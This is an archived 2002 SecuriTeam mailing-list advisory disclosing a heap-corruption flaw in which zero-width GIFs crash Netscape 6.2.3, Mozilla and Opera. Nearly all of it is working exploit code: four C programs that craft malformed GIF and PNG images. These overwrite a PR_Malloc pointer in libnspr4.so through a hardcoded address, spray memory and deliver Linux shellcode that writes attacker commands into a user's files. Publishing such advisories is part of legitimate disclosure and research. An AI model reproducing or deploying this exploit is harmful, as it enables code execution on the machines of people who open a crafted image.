[EXPL] Zero Width GIF (Exploit)
From: support@securiteam.comDate: 09/08/02
- Previous message: support@securiteam.com: "[UNIX] PHP header() CRLF Injection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 8 Sep 2002 22:50:12 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Zero Width GIF (Exploit)
------------------------------------------------------------------------
SUMMARY
Zero width GIF file can cause an exploitable heap corruption. The
following advisory contains an example exploit for malformed GIFs under
Netscape 6.2.3. This vulnerability also affects a number of other
browsers, including Mozilla (of course) and manages to kill Opera.
DETAILS
Exploit:
create.c
main()
{
int c;
close(1);
unlink("mapfile.ppm");
open("mapfile.ppm",65,0660);
printf("P6 256 1 255\n");
for(c=0;c<256;c++)
{
printf("%c%c%c",c,c,c);
}
}
enc.c
char was[]=
"\xef\xbe\xad\xde\x1a\xc0\xca\xc0\x11\x22\x33\x44\x88\x77\x66\x55"
"\xef\xbe\xad\xde\x1a\xc0\xca\xc0\x11\x22\x33\x44\x88\x77\x66\x55"
"\xef\xbe\xad\xde\x1a\xc0\xca\xc0\x11\x22\x33\x44\x88\x77\x66\x55"
"\xef\xbe\xad\xde\x1a\xc0\xca\xc0\x11\x22\x33\x44\x88\x77\x66\x55"
"\xef\xbe\xad\xde\x1a\xc0\xca\xc0\x11\x22\x33\x44\x88\x77\x66\x55"
"\xef\xbe\xad\xde\x1a\xc0\xca\xc0\x11\x22\x33\x44\x88\x77\x66\x55";
int waslen=0;
main()
{
char c[256][3];
int cu=0;
int x;
printf("P6 1 256 255\n");
waslen=strlen(was);
for(x=0;x<waslen;x+=3)
{
char v[4];
int count,found=0;
v[0]=was[x+0];
v[1]=was[x+1];
v[2]=was[x+2];
v[3]=0;
if(cu>255){
perror("failed on colormap, expected:");
exit(1);
}
for(count=0;count<cu;count++)
{
if(!strncmp(v,&c[count]))
{
printf("%c%c%c",v[0],v[1],v[2]);
found=1;
}
}
if(!found)
{
printf("%c%c%c",v[0],v[1],v[2]);
memcpy(c[cu++],v,3);
}
}
for(;cu<256;cu++)
{
c[cu][0]=cu;
c[cu][1]=cu;
c[cu][2]=cu;
printf("%c%c%c",c[cu][0],c[cu][1],c[cu][2]);
}
}
generic.c
char large[128000];
int f;
#define TARGET (0x40197000 /*libnspr4.so*/ + /*PR_Malloc*/ 0x00029270)
#define REPLACE 0x41AB005E /* "shellcode" */
int inv(short c)
{
return c;
return ((c&0xff)<<8)|((c&0xff00)>>8);
}
void doc(char *c)
{
write(f,c,1);
write(f,c,1);
write(f,c,1);
}
void add(int ix)
{
char*p=(char*)&ix;
doc(&p[0]);
doc(&p[1]);
doc(&p[2]);
doc(&p[3]);
}
int ar[]=
{
0x12344321,
0x87655678,
0x01020304,
0x04030201,
0x11223344,
0x87654321,
0};
main()
{
int y=2;
int x=0;
int z=0,c,siz;
char header[100];
int rx=9*4;
int ry=1;
printf("x=%d y=%d\n",x,y);
sprintf(header,"P6 %1$d %2$d 255\n",rx,ry);
unlink("img1.ppm");
unlink("img1.ppm");
f=open("img1.ppm",65,0664);
if(!(f+1))exit(1);
write(f,header,strlen(header));
add(0x20656964);
add(0x2e776f6e);
add(0);
add(0);
add(TARGET-12);
add(REPLACE);
for(c=0;c<rx*ry;c++)
{
add(0);
}
close(f);
system("ppmtogif -sort -map mapfile.ppm <img1.ppm >tmp1.gif");
f=open("tmp1.gif",0);
if(!(f+1))exit(1);
memset(large,0,128000);
siz=read(f,large,128000);
close(f);
unlink("img1.gif");
f=open("img1.gif",65,0664);
if(!(f+1))exit(1);
*(short*)&large[6]=inv(x);
*(short*)&large[8]=inv(y);
/* */
*(short*)&large[0x0312]=inv(x);
*(short*)&large[0x0314]=inv(y);
/* */
write(f,large,siz);
close(f);
}
pngshellcode.c
/*
* This program makes 2048x4000 .ppm file, and converts it into a
* valid png file, around 22k or so. It uncompresses to the
* full 24576000 bytes of data, which pushes the memory ranges
* accessible way up... making 0x42424242 a valid address.
*
* There are 2 parts to the image file:
* 1) The shellcode. This code is ripped almost exactly from
* the jar exploit image maker, with the only modifications
* being the image size (was 2048x2048) and the next section.
* 2) A large number of pointers to the shellcode. This is the
* part that will be at address 0x42424242.
*
* See pngcrash.c for how we get 0x42424242 to be used as a pointer
* to a function.
*/
//#define TESTING
//#define EXEC
#define SIZ (3*2048*4000)
char *buf;
char code[]=
"\xeb\x02\xeb\x0d\xe8\xf9\xff\xff\xff\x90\x90\x90\x90\x90\x90\x90"
"\x90\x58\x8b\x18\x85\xdb\x75\x02\xeb\xfe\x31\xdb\x89\x18\xbc\xe0"
"\xff\xff\xbf\x89\xe6\xbb\x01\x48\x4f\x4d\x4b\x4e\x8b\x0e\x39\xcb"
"\x75\xf9\xbb\x4f\x4d\x45\x3d\x46\x46\x8b\x0e\x39\xcb\x74\x04\x4e"
"\x4e\xeb\xe2\xc7\x06\xef\xbe\xad\xde\x81\x2e\xef\xbe\xad\xde\x46"
"\x46\x46\x46\x89\xf7\x46\x8b\x0e\x84\xc9\x75\xf9\xc7\x06\x2f\x2e"
"\x6d\x61\x46\x46\x46\x46\xc7\x06\x73\x68\x72\x63\x46\x46\x46\x46"
"\xc7\x06\xef\xbe\xad\xde\x81\x2e\xef\xbe\xad\xde\x31\xc0\x31\xc9"
"\x31\xd2\x89\xfb\x04\x0a\xcd\x80\x31\xc0\x04\x05\x80\xc1\x41\x66"
"\x81\xc2\xb0\x01\xcd\x80\x89\xc6\x40\x85\xc0\x74\x17\xeb\x1a\x59"
"\x89\xf3\x31\xd2\xb2\x50\x31\xc0\x04\x04\xcd\x80\x89\xf3\x31\xc0"
"\x04\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe1\xff\xff\xff\x23\x73"
"\x6f\x6d\x65\x20\x72\x61\x6e\x64\x6f\x6d\x20\x63\x6f\x6d\x6d\x61"
"\x6e\x64\x73\x0a\x74\x6f\x75\x63\x68\x20\x2f\x76\x61\x72\x2f\x74"
"\x6d\x70\x2f\x6f\x77\x6e\x65\x64\x2e\x60\x77\x68\x6f\x61\x6d\x69"
"\x60\x0a\x65\x78\x69\x74\x0a\x7a\x65\x6e\x2d\x70\x61\x72\x73\x65"
"\x20\x6f\x77\x6e\x65\x64\x20\x79\x6f\x75\x2e\x2e\x2e\x0a";
char addr[4];
main()
{
int f,x,y,z,c=0,ofs=2;
buf=(char*)malloc(SIZ);
if(!buf)exit(1);
unlink("scode.ppm");
f=open("scode.ppm",65,644);
if(f==-1)exit(1);
write(f,"P6 2048 4000 255\n",17);
#ifndef TESTING
memset(buf,'@',SIZ);
for(y=0;y<2048;y++)
{
for(x=0;x<3*2048;x+=2)
{
if((x<950)||(x>1024))buf[x+3*y*2048]=0xeb;
}
strcpy(&buf[1024+(3*y*2048)],code);
}
// *(int*)&addr=0xdeadbeef;
*(int*)&addr=0x41ab005e;
for(;y<4000;y++)
{
for(x=0;x<3*2048;x++)
{
buf[x+(3*y*2048)]=addr[ofs++];
ofs%=4;
}
}
#else
memset(buf,0xcc,SIZ);
#endif
strcpy(&buf[SIZ-(strlen(code)+1)],code);
write(f,buf,SIZ);
close(f);
#ifndef EXEC
free(buf);
if(system("pnmtopng <scode.ppm >scode.png"))
{
printf("png creation failed\n");
exit(1);
};
unlink("scode.ppm");
#else
__asm__("
movl buf,%eax
call *%eax
");
#endif
printf("Shellcode length: %d\n",strlen(code));
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:zen-parse@gmx.net>
zen-parse.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] PHP header() CRLF Injection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
